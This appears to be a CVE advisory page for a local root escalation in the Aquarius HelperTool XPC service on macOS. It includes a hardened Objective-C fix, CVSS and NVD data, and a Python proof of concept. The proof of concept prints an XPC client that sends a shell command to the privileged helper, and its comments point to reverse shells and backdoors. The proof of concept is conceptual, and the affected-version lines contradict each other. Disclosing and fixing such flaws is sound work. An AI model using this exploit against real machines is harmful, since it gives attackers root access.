Security Vulnerability Report
CVE-2025-65842 CVSS 5.1 MEDIUM

Published: 2025-12-03 17:15:54
Last Modified: 2025-12-18 20:41:33

Description

The Aquarius HelperTool (1.0.003) privileged XPC service on macOS contains multiple flaws that allow local privilege escalation. The service accepts XPC connections from any local process without validating the client's identity, and its authorization logic incorrectly calls AuthorizationCopyRights with a NULL reference, causing all authorization checks to succeed. The executeCommand:authorization:withReply: method then interpolates attacker-controlled input into NSTask and executes it with root privileges. A local attacker can exploit these weaknesses to run arbitrary commands as root, create persistent backdoors, or obtain a fully interactive root shell.
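The description names three distinct defects: no check on who is connecting, a rights check run against a NULL AuthorizationRef, and request text interpolated into NSTask. The Objective-C below is an added example written for this page, not the HelperTool's own code, showing how a hardened NSXPC helper closes each one; the right name, the client signing requirement string, the allow-listed action and the parameter types of executeCommand:authorization:withReply: are assumptions, and setCodeSigningRequirement: needs macOS 13 or later.

```objc
#import <Foundation/Foundation.h>
#import <Security/Security.h>
// Hypothetical right name and client signing requirement (the real tool's values are not on
// the page); the right is assumed to be registered in the policy database with a rule that
// requires admin authentication.
static NSString *const kRightName = @"com.example.aquarius.helpertool.execute";
static NSString *const kClientRequirement =
    @"anchor apple generic and identifier \"com.example.aquarius.app\" and "
     "certificate leaf[subject.OU] = \"TEAMID0000\"";
@interface HelperTool : NSObject <NSXPCListenerDelegate>
@end
@implementation HelperTool
// Flaw 1: any local process could connect. XPC enforces the signing requirement on the
// peer itself (macOS 13+), so there is no pid-based lookup for a client to race.
- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)conn {
    [conn setCodeSigningRequirement:kClientRequirement];
    // exportedInterface / exportedObject setup and [conn resume] omitted
    return YES;
}
// Flaw 2: a NULL AuthorizationRef. Rebuild the ref from the client's external form and
// fail closed on every error, so AuthorizationCopyRights only ever sees a valid ref.
- (BOOL)clientHoldsRight:(NSData *)authData {
    if (authData.length != sizeof(AuthorizationExternalForm)) return NO;
    AuthorizationRef authRef = NULL;
    if (AuthorizationCreateFromExternalForm(authData.bytes, &authRef) != errAuthorizationSuccess
        || authRef == NULL) return NO;
    AuthorizationItem item = { kRightName.UTF8String, 0, NULL, 0 };
    AuthorizationRights rights = { 1, &item };
    // No kAuthorizationFlagInteractionAllowed: a root helper must never prompt on its own.
    OSStatus status = AuthorizationCopyRights(authRef, &rights, kAuthorizationEmptyEnvironment,
                                              kAuthorizationFlagExtendRights, NULL);
    AuthorizationFree(authRef, kAuthorizationFlagDefaults);
    return status == errAuthorizationSuccess;
}
// Flaw 3: the request was interpolated into a shell command. Here it names an allow-listed
// action and NSTask gets a fixed executable plus argument array, with no shell involved.
- (void)executeCommand:(NSString *)action authorization:(NSData *)authData
             withReply:(void (^)(NSNumber *status))reply {
    NSDictionary *allowed = @{ @"list-plugins": @[ @"/bin/ls", @"/Library/Audio/Plug-Ins" ] };
    NSArray *argv = allowed[action];
    if (argv == nil || ![self clientHoldsRight:authData]) { reply(@(-1)); return; }
    NSTask *task = [NSTask new];
    task.executableURL = [NSURL fileURLWithPath:argv[0]];
    task.arguments = [argv subarrayWithRange:NSMakeRange(1, argv.count - 1)];
    if (![task launchAndReturnError:NULL]) { reply(@(-1)); return; }
    [task waitUntilExit];
    reply(@(task.terminationStatus));
}
@end
```

The app side obtains the right with AuthorizationCopyRights plus kAuthorizationFlagInteractionAllowed and ships only the AuthorizationExternalForm over XPC, so the helper can verify the grant without ever prompting as root.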

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:acustica-audio:aquarius_helpertool:1.0.003:*:*:*:*:*:*:* - VULNERABLE
Aquarius HelperTool < 1.0.003
macOS (all systems running an affected HelperTool version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-65842 PoC - Aquarius HelperTool Local Privilege Escalation
Note: This is a proof-of-concept demonstrating the vulnerability concept.
Use only in authorized testing environments.
"""


def exploit_cve_2025_65842():
    """
    Exploit the Aquarius HelperTool XPC service vulnerability.
    The service does not validate XPC client identity and has flawed
    authorization logic that allows arbitrary command execution as root.
    """
    # Malicious command to be executed with root privileges
    # In a real attack, this could be: reverse shell, backdoor, etc.
    malicious_command = "/bin/bash -c 'echo root:0 >> /tmp/pwned && chmod 777 /tmp/pwned'"

    # XPC connection to the vulnerable service
    # The service accepts connections from any process without validation
    xpc_service = "com.aquarius.helpertool"

    print(f"[*] Attempting to connect to vulnerable XPC service: {xpc_service}")
    print(f"[*] Sending malicious command: {malicious_command}")

    # Since this is macOS-specific and requires Objective-C/Swift XPC APIs,
    # here's the conceptual XPC client code:
    xpc_client_template = '''
#import <Foundation/Foundation.h>
#import <xpc/xpc.h>

int main() {
    xpc_connection_t conn = xpc_connection_create_mach_service(
        "com.aquarius.helpertool", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED
    );
    xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
        // Handle connection events
    });
    xpc_connection_resume(conn);

    // Create malicious message - service doesn't validate sender
    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_string(msg, "command", "{malicious_command}");

    // Send message - authorization check bypassed due to NULL reference
    xpc_connection_send_message(conn, msg);
    return 0;
}
'''
    # str.format() would choke on the C braces in the template, so substitute
    # the single placeholder with a plain replace instead.
    xpc_client_code = xpc_client_template.replace("{malicious_command}", malicious_command)

    print("\n[!] XPC Client Code (requires compilation on macOS):")
    print(xpc_client_code)

    # For demonstration, show what would happen
    print("\n[+] If vulnerable, the following command would execute as root:")
    print(f"    {malicious_command}")
    return True


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65842 PoC - Aquarius HelperTool LPE")
    print("=" * 60)
    exploit_cve_2025_65842()
```

References

https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/ (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-65842",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T17:15:54.317",
    "lastModified": "2025-12-18T20:41:32.903",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Aquarius HelperTool (1.0.003) privileged XPC service on macOS contains multiple flaws that allow local privilege escalation. The service accepts XPC connections from any local process without validating the client's identity, and its authorization logic incorrectly calls AuthorizationCopyRights with a NULL reference, causing all authorization checks to succeed. The executeCommand:authorization:withReply: method then interpolates attacker-controlled input into NSTask and executes it with root privileges. A local attacker can exploit these weaknesses to run arbitrary commands as root, create persistent backdoors, or obtain a fully interactive root shell."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-266" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:acustica-audio:aquarius_helpertool:1.0.003:*:*:*:*:*:*:*",
                "matchCriteriaId": "9EA89156-5C87-474C-92A2-CDA92F828BAB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```